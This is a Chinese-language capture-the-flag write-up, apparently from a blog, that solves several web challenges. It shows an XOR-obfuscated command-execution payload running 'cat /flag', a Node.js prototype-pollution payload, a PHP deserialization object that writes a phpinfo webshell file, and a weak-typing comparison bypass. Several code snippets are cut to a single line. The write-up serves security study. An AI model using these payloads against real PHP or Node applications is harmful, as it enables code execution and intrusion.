目录
easyphp
fuzz寻找到一个符合参数条件的即可:
url:a=is_callable&b=phpinfo
rceme
考点:无字符webshell
异或绕过即可,异或字符生成脚本:
1 |
$number='5'; |
payload:
1 |
{if:('FlFAPX'^'555555')('cat /flag')}{end if} |
得到flag:flag{47cc2a08-52fc-45c7-a291-39cc0f3641fd}
littlegame
考点:原型链污染
npm instal的时候就会直接提示有原型链污染了
在谷歌搜索到相关例子:
1 |
const setFn = require('set-value'); |
在index.js中找到一个污染的点:
构造payload:
1 |
NewAttributeKey=constructor.prototype.abc&NewAttributeValue=sanzhi |
发送到:Privilege
再直接去DeveloperControlPanel发送数据包如下得到flag
1 |
NewAttributeKey=constructor.prototype.abc&NewAttributeValue=sanzhi |
flag{993231b5-1deb-4836-bb03-56f42d34a8b0}
babyunserialize
考点:反序列化
反序列化触发的魔术方法在Jig的destruct,构造poc如下:
1 |
|
序列化得到的结果:
1 |
O:6:"DB\Jig":3:{s:7:"%00*%00data";a:1:{s:7:"zhi.php";a:1:{s:4:"path";s:18:"";}}s:7:"%00*%00lazy";b:1;s:6:"%00*%00dir";s:3:"san";} |
生成出来的值没有<?php phpinfo();?>
,手动添加上去。
1 |
O:6:"DB\Jig":3:{s:7:"%00*%00data";a:1:{s:7:"zhi.php";a:1:{s:4:"path";s:18:"<?php phpinfo();?>";}}s:7:"%00*%00lazy";b:1;s:6:"%00*%00dir";s:3:"san";} |
访问sanzhi.php,在phpinfo的界面搜索flag得到flag
flag{61b95766-7287-4fcd-842b-9b72c0b56518}
easytrick
考点:弱类型的trick
绕过点在于:
1 |
if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){ |
用无穷大进行绕过:
1 |
$a = new trick(); |
得到flag: flag{2a5ffe41-0725-4171-902f-f85d3ff1a451}
- By:threezh1.com
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论